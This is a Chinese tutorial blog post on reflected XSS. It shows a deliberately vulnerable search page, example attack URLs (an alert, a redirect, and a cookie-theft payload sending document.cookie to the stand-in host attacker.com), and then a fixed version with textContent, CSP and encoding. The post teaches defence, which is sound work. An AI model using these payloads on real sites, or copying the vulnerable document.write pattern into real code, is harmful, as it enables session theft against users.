ZBLOG

注册 原创投稿

给一个简单的 html XSS漏洞反射形漏洞和攻击示例

作者:golang云原生栏目:公开2025-05-16 10:42182

HTML 反射型 XSS 漏洞示例

存在漏洞的 HTML 页面 (vulnerable.html)

  1. <!DOCTYPE html>
  2. <html>
  3. <head>
  4.     <title>搜索页面</title>
  5. </head>
  6. <body>
  7.     <h1>搜索功能</h1>
  8.     
  9.     <!-- 存在XSS漏洞的搜索框 -->
  10.     <form action="" method="GET">
  11.         <input type="text" name="query" placeholder="输入搜索内容">
  12.         <button type="submit">搜索</button>
  13.     </form>
  15.     <!-- 未经过滤直接输出用户输入 -->
  16.     <div id="results">
  17.         您搜索的内容是: 
  18.         <script>
  19.             // 从URL参数获取查询内容并直接显示
  20.             const params = new URLSearchParams(window.location.search);
  21.             document.write(params.get('query') || '');
  22.         </script>
  23.     </div>
  24. </body>
  25. </html>

攻击示例

正常请求

  1. http://example.com/vulnerable.html?query=手机

页面会显示:您搜索的内容是: 手机

XSS攻击请求

  1. 简单弹窗攻击
  1. http://example.com/vulnerable.html?query=<script>alert('XSS攻击!')</script>
  1. 窃取Cookie
  1. http://example.com/vulnerable.html?query=<script>new Image().src='http://attacker.com/steal.php?cookie='+document.cookie;</script>
  1. 重定向到恶意网站
  1. http://example.com/vulnerable.html?query=<script>window.location.href='http://malicious-site.com'</script>

修复方案

  1. <!DOCTYPE html>
  2. <html>
  3. <head>
  4.     <title>安全的搜索页面</title>
  5. </head>
  6. <body>
  7.     <h1>搜索功能</h1>
  9.     <!-- Content Security Policy (CSP)头 -->
  10.     <meta http-equiv="Content-Security-Policy" content="default-src 'self'">
  12.     <form action="" method="GET">
  13.         <input type="text" name="query" placeholder="输入搜索内容">
  14.         <button type="submit">搜索</button></form>
  16.     <!-- 安全地输出用户输入 -->
  17.     <div id="results">
  18.         您搜索的内容是: 
  19.         <span id="safe-output"></span></div>
  21.     <!-- 使用textContent而不是innerHTML或document.write -->
  22.     <script nonce="随机值">
  23.         const params = new URLSearchParams(window.location.search);
  24.         document.getElementById('safe-output').textContent = params.get('query') || '';
  25.         
  26.         // DOM XSS防护 - JavaScript编码
  27.         function encodeForJS(str) {
  28.             return str.replace(/\\/g, '\\\\')
  29.                      .replace(/'/g, "\\'")
  30.                      .replace(/"/g, '\\"')
  31.                      .replace(/`/g, '\\`');
  32.         }
  33.         
  34.         // HTML实体编码函数
  35.         function encodeForHTML(str) {
  36.             return str.replace(/&/g, '&amp;')
  37.                      .replace(/</g, '&lt;')
  38.                      .replace(/>/g, '&gt;')
  39.                      .replace(/"/g, '&quot;')
  40.                      .replace(/'/g, '&#39;');
  41.         }
  42.         
  43.         // URL编码函数
  44.         function encodeForURL(str) {
  45.             return encodeURIComponent(str);
  46.         }
  47.         
  48.       </script></body></html>

防御措施总结:

  1. 对输出进行编码:使用 textContent 而不是 innerHTML
  2. 实施CSP策略:限制脚本执行来源
  3. 使用nonce属性:只允许特定脚本执行
  4. 设置HttpOnly Cookie:防止通过JavaScript访问敏感Cookie


    内容由零声教学AI助手提供,问题来源于学员提问

本站部分文章来源于网络,版权归原作者所有,如有侵权请联系站长删除。
转载请注明出处:https://golang.0voice.com/?id=23139

golang云原生 golang云原生 管理员
分享:
扫描分享到社交APP
上一篇
下一篇

相关推荐

发表列表
游客 游客
此处应有掌声~
评论列表

还没有评论,快来说点什么吧~

golang云原生

golang云原生

  • 23956文章
  • 0评论
  • 2粉丝
  • 0被赞
最近发布
热门排行
热评文章
猜您喜欢
热门标签
Copyright ©2022    湖南零声信息科技有限公司    版权所有     湘ICP备18009867号-1          证照中心 

联系我们

在线咨询: 点击这里给我发消息

微信号:3007537140

上班时间: 10:30-22:30

关注我们
x

注册

已经有帐号?
简单注册快人一步